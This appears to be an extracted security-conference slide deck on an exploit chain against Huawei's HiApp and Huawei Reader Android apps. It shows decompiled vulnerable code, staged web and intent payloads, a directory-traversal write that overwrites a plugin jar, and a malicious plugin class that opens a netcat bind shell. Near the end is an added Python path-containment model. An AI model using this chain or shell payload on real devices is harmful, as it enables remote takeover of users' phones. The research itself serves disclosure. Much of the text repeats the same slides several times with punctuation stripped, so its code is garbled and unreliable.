package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp – stage2.html (CVE-2018-7932)
37
    var pkg = "com.huawei.hwireader";
    var uri = "android-app://http://www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAIL;S.url=http://192.168.137.1:8000/stage3.html;end";
    window.HiSpaceObject.launchApp(pkg, uri);
Stage 2 (figure): Browse to Website on Device → BROWSABLE Intent - WebView → Exported Intent - WebView → Code Exec and Profit
Huawei Reader Application
39
Huawei Reader – Input Validation (CVE-2017-15308)
40
    protected void onCreate(Bundle arg8) {
        CharSequence v0_1;
        String v0;
        CharSequence v1 = null;
        super.onCreate(arg8);
        // ...
        Intent v2 = this.getIntent();
        if(v2 != null) {
            Uri v3 = v2.getData();
            if(v3 != null) {
                v0 = v3.getScheme();
                // ...
            }
            else {
                v0_1 = v1;
            }
            // ...
            v0 = v2.getStringExtra("url");
            if(TextUtils.isEmpty(((CharSequence)v0))) {
                goto label_51;
            }
            // the "url" extra goes straight into the WebView, no validation of its origin
            this.loadRefreshUrl(v0);
Huawei Reader – Input Validation (CVE-2017-15308)
41
    @JavascriptInterface public void do_command(String arg9) {
        // ...
        String v4 = ((JSONObject)v2_3).getString("Action");
        LOG.I("js actionName " + v4);
        JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data");
        if(v4.equalsIgnoreCase("onlineReader")) {
            JSProtocol.mJSBookProtocol.online(v5);
            return;
        }
        if(v4.equalsIgnoreCase("readNow")) {
            JSProtocol.mJSBookProtocol.readNow(v5);
            return;
        }
        // ...
Huawei Reader – Arbitrary Write – Directory Traversal (CVE-2017-15309)
42
    public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
        // ...
        v8 = 0;
        v10 = v4;
        v4_1 = 0;
        try {
            int v13 = v7.getInt("Type");
            v14 = v7.optInt("Version");
            v15 = v7.optBoolean("getDrmAuth", true);
            v3 = PATH.getBookDir() + v7.getString("FileName");   // FileName is concatenated unchecked
            v2 = v7.getInt("FileId");
            v6 = v7.getString("DownloadUrl");
            // ...
Huawei Reader – Arbitrary Write – Directory Traversal (CVE-2017-15309)
43
    function download_plugin() {
        var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
            '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,"FileName":"../plugins/DFService/classes.jar",' +
            '"FileSize":10000000,"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip",' +
            '"DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }
Stage 3 (figure): Browse to Website on Device → BROWSABLE Intent - WebView → Exported Intent - WebView → File Write → Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
45
    public boolean onChapPack(JSONObject arg10) {
        boolean v0_2;
        try {
            int v3 = arg10.getInt("StartIndex");
            int v4 = arg10.getInt("EndIndex");
            String v2 = arg10.getString("Price");
            int v1 = arg10.getInt("BookId");
            String v5 = arg10.getString("PayURL");
            String v0_1 = arg10.getString("DownloadURL");
            String v7 = PATH.getBookDir() + arg10.getString("FileName");
            if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && Device.getNetType() != 0xFFFFFFFF) {
                FILE.delete(PATH.getBookCachePathNamePostfix(v7));
                FILE.delete(v7);
            // ...
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
46
    public static String getBookNameCheckOpenFail(String arg2) {
        return PATH.getOpenFailDir() + MD5.getMD5(arg2);
    }
    public static String getOpenFailDir() {
        return PATH.getWorkDir() + "books/openfail/";
    }
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
47
    5457bea93d0548a4d84357308df45322 = ../plugins/DFService/classes.jar
    /sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322
    /sdcard/HWiReader/books/../plugins/DFService/classes.jar
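Added example, not the app's code: a Python model of the path handling on slides 42 to 47. It reproduces PATH.getBookDir(), getOpenFailDir() and the MD5 marker under the /sdcard/HWiReader/ layout shown above, puts the unchecked concatenation beside a containment check that rejects any FileName resolving outside books/, and pulls FileName out of a do_command() payload so the check can run where the bridge receives the JSON. The sample payload is constructed here with the page's FileName; its download URL is a placeholder.

```python
"""Model of the Huawei Reader book-path handling (added example, not the app's code).

Layout from the slides: PATH.getWorkDir() is /sdcard/HWiReader/, books live in
books/ underneath it and the open-fail markers in books/openfail/<MD5 of book path>.
Paths are handled with posixpath only, so nothing here touches the filesystem.
"""
import hashlib
import json
import posixpath

WORK_DIR = "/sdcard/HWiReader/"              # PATH.getWorkDir()
BOOK_DIR = WORK_DIR + "books/"               # PATH.getBookDir()
OPENFAIL_DIR = WORK_DIR + "books/openfail/"  # PATH.getOpenFailDir()


def vulnerable_book_path(file_name: str) -> str:
    """PATH.getBookDir() + FileName, exactly as originalDownload() and onChapPack() build it."""
    return BOOK_DIR + file_name


def resolve(path: str) -> str:
    """Collapse '.' and '..' the way the kernel will when the path is opened."""
    return posixpath.normpath(path)


def safe_book_path(file_name: str) -> str:
    """Hardened replacement: the resolved path must stay inside BOOK_DIR."""
    if not file_name or "\x00" in file_name or file_name.startswith("/"):
        raise ValueError("rejected FileName: %r" % file_name)
    base = resolve(BOOK_DIR)
    candidate = resolve(posixpath.join(BOOK_DIR, file_name))
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError("FileName escapes the book directory: %r" % file_name)
    return candidate


def openfail_marker(book_path: str) -> str:
    """PATH.getBookNameCheckOpenFail(): openfail dir + MD5 of the unresolved book path.

    onChapPack() only deletes the book when this marker exists, which is why the
    arbitrary write has to create it before the delete can be triggered.
    """
    return OPENFAIL_DIR + hashlib.md5(book_path.encode("utf-8")).hexdigest()


def file_name_from_payload(do_command_json: str) -> str:
    """Pull Data.DownloadInfo.FileName out of a ZhangYueJS.do_command() payload."""
    return json.loads(do_command_json)["Data"]["DownloadInfo"]["FileName"]


def check_payload(do_command_json: str) -> dict:
    """Report where the unchecked concatenation would write and whether the
    containment check would let the FileName through."""
    name = file_name_from_payload(do_command_json)
    raw = vulnerable_book_path(name)
    try:
        safe_book_path(name)
        allowed = True
    except ValueError:
        allowed = False
    return {"file_name": name, "resolves_to": resolve(raw),
            "escapes_book_dir": not allowed, "openfail_marker": openfail_marker(raw)}


# Constructed payload: same shape and FileName as the page's stage 3 download,
# with a placeholder download URL.
PLUGIN_OVERWRITE_PAYLOAD = json.dumps({
    "Action": "onlineReader",
    "Data": {"Charging": {"FeeType": 0, "OrderUrl": "http://192.168.137.1:8001/aaaaa", "Price": 0},
             "DownloadInfo": {"ChapterId": 1, "FeeUnit": 10, "Type": 1, "FileId": 32532639,
                              "FileName": "../plugins/DFService/classes.jar",
                              "FileSize": 10000000, "DownloadUrl": "http://PLACEHOLDER/test.zip",
                              "Version": 2}}})

if __name__ == "__main__":
    for name in ("book.epub", "../plugins/DFService/classes.jar"):
        print(name, "->", resolve(vulnerable_book_path(name)))
    print(check_payload(PLUGIN_OVERWRITE_PAYLOAD))
```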
Huawei Reader – Insecure Plugin Loading
48
    public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
        return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
    }
    protected final ArrayList P() {
        if(pR == null) {
            try {
                PlatForm v3 = new PlatForm();
                Object v2 = Util.loadPlug(APP.getAppContext(), v3.getPlugDir("DFService") + "classes.jar", "com.zhangyue.iReader.Plug.Service.DocFeature").newInstance();
                v2.setPlatform(((IPlatform)v3));
                pR = ((IPlugDFService)v2);
            // ...
Huawei Reader – Insecure Plugin Loading
49
    function download_plugin() {
        document.writeln("++ Downloading replacement classes.jar ++");
        // It should be noted that FileId needs to be unique for the download to work correctly
        var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
            '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',"FileName":"../plugins/DFService/classes.jar",' +
            '"FileSize":10000000,"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }
Huawei Reader – Payload Creation
50
